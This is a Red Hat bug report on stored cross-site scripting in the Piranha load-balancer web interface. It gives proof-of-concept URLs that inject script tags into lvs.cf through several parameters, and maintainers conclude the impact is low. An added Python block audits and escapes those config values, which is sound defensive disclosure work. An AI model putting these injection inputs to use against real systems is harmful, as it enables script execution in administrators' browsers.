Bug 1051551

Summary: piranha: multiple stored XSS issues
Product: [Other] Security Response
Reporter: Othman Madjoudj <athmanem>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX
QA Contact:
Severity: low
Docs Contact:
Priority: low
Version: unspecified
CC: bperkins, cluster-maint, jrusnack, rohara, vkrizan
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: Unspecified
OS: Unspecified
Whiteboard:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-10-27 21:55:48 UTC
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1275699
Bug Blocks: 1062151

Attachments:
A screenshot of one of the issues (flags: none)

Description Othman Madjoudj 2014-01-10 14:52:31 UTC
Description of the issue:

It seems that the Piranha web application does not escape its output and/or user input (hostnames/IPs/etc.), which leads to Cross-Site Scripting vulnerabilities; some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf'.

Tested version:

piranha-0.8.6-4.el6.x86_64

Examples of the vulnerabilities:

1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php):
NB. port, address and other parameters are also vulnerable.

PoC:
----
http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT

Result:
The injection in the PoC will appear in the following page:
http://server:3636/secure/virtual_main.php

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\r\n\r\n"
     expect = "HTTP"
     use_regex = 0
     load_monitor = none
     scheduler = wlc
     protocol = tcp
     timeout = 6
     reentry = 15
     quiesce_server = 0
}

2) stored XSS in redundant parameter (redundancy.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
backup = 0.0.0.0><script>alert(1)</script>
[...]


3) stored XSS in PriLVSIP (global_settings.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
primary = 192.168.1.100"><script>alert(1)</script>
[...]

Comment 1 Othman Madjoudj 2014-01-10 14:54:32 UTC
Created attachment 848233 [details]
A screenshot of one of the issues

Comment 2 Tomas Hoger 2014-02-05 20:35:04 UTC
(In reply to Athmane Madjoudj from comment #0)
> which leads to Cross Site Scripting vulnerabilities, some of them are
> reflected (low impact)

Your report does not seem to specify any reflected XSS; only 3 stored XSS are listed.

> and some are persistent/stored (high impact) in the configuration file
> '/etc/sysconfig/ha/lvs.cf'

That's correct, input from lvs.cf is not encoded properly before being added to the output of the web application. However, I disagree with the high impact rating. For the application, lvs.cf is really a trusted input. Also, privileges to edit the file via the web application are administrative privileges, which makes this more of a bug than a real security issue.
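The two points raised above, that form values are written into lvs.cf unchecked and that lvs.cf values are echoed into the pages without output encoding, can be checked mechanically. The following Python is an added illustration, not part of this bug report and not Piranha's own code. It assumes only the two line shapes quoted in the report ('key = value' and 'virtual NAME { ... }'), treats the 'virtual' name as a hostname (an assumption based on the form parameter being called 'hostname'), and uses a constructed lvs.cf fragment built from the three snippets in comment 0. `audit_lvs_cf` is an allow-list check a defender could run over an existing file to find entries that carry markup instead of an address or hostname, and `render_value` shows the output encoding the pages lack (the Python equivalent of PHP's htmlspecialchars).

```python
import html
import ipaddress
import re

# Constructed sample in the layout the report shows for /etc/sysconfig/ha/lvs.cf:
# the 'primary', 'backup' and 'virtual' entries from the three PoCs, plus one
# clean 'virtual' block for contrast. Not a real file from any system.
SAMPLE_LVS_CF = """\
primary = 192.168.1.100"><script>alert(1)</script>
backup = 0.0.0.0><script>alert(1)</script>
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     scheduler = wlc
     protocol = tcp
}
virtual webfarm {
     active = 1
     address = 10.0.0.5 eth0:1
     port = 443
}
"""

# RFC 1123-style hostname check (assumption: the 'virtual' name is meant to be
# a hostname, as the form parameter name 'hostname' suggests).
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)'
    r'[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
)


def parse_lvs_cf(text):
    """Minimal parser for the two line shapes the report shows:
    'key = value' at top level or inside a block, and 'virtual NAME {' ... '}'.
    Returns (top_level, virtuals) where virtuals maps block name -> fields."""
    top_level, virtuals = {}, {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith('virtual ') and line.endswith('{'):
            name = line[len('virtual '):-1].strip()
            current = virtuals.setdefault(name, {})
            continue
        if line == '}':
            current = None
            continue
        key, sep, value = line.partition('=')
        if sep:
            target = current if current is not None else top_level
            target[key.strip()] = value.strip()
    return top_level, virtuals


def is_ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def is_hostname(value):
    return HOSTNAME_RE.match(value) is not None


def audit_lvs_cf(text):
    """Allow-list check of the fields the report shows being written from form
    input. Returns (location, offending_value) pairs; an empty list means every
    checked field is a plain IPv4 address or hostname and carries no markup."""
    top_level, virtuals = parse_lvs_cf(text)
    findings = []
    for key in ('primary', 'backup'):
        if key in top_level and not is_ipv4(top_level[key]):
            findings.append((key, top_level[key]))
    for name, fields in virtuals.items():
        if not is_hostname(name):
            findings.append(('virtual', name))
        # 'address = <ip> <device>': only the first token is the IP
        addr = fields.get('address', '').split()
        if addr and not is_ipv4(addr[0]):
            findings.append(('virtual %s/address' % name, addr[0]))
    return findings


def render_value(value):
    """Output encoding the web pages lack: HTML-escape a config value before
    echoing it into a page, so stored markup is displayed rather than executed."""
    return html.escape(value, quote=True)


if __name__ == '__main__':
    for where, value in audit_lvs_cf(SAMPLE_LVS_CF):
        print('%s: rejected %r -> would render as %s'
              % (where, value, render_value(value)))
```

Run against the constructed sample it reports the three injected entries and leaves the clean 'webfarm' block alone. The two functions correspond to the two layers of the fix: validate on the way into lvs.cf (so the file never holds anything but addresses and hostnames), and encode on the way out (so a value that does slip in is shown as text).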

Comment 6 Othman Madjoudj 2014-02-05 21:43:20 UTC
(In reply to Tomas Hoger from comment #2)
> (In reply to Athmane Madjoudj from comment #0)
> > which leads to Cross Site Scripting vulnerabilities, some of them are
> > reflected (low impact)
> 
> Your report does not seem to specify any reflected XSS; only 3 stored XSS are
> listed.
> 

I didn't have time to check everything, so I could be wrong about reflected XSS.


> > and some are persistent/stored (high impact) in the configuration file
> > '/etc/sysconfig/ha/lvs.cf'
> 
> That's correct, input from lvs.cf is not encoded properly before being
> added to the output of the web application. However, I disagree with the
> high impact rating. For the application, lvs.cf is really a trusted input.
> Also, privileges to edit the file via the web application are
> administrative privileges, which makes this more of a bug than a real
> security issue.

True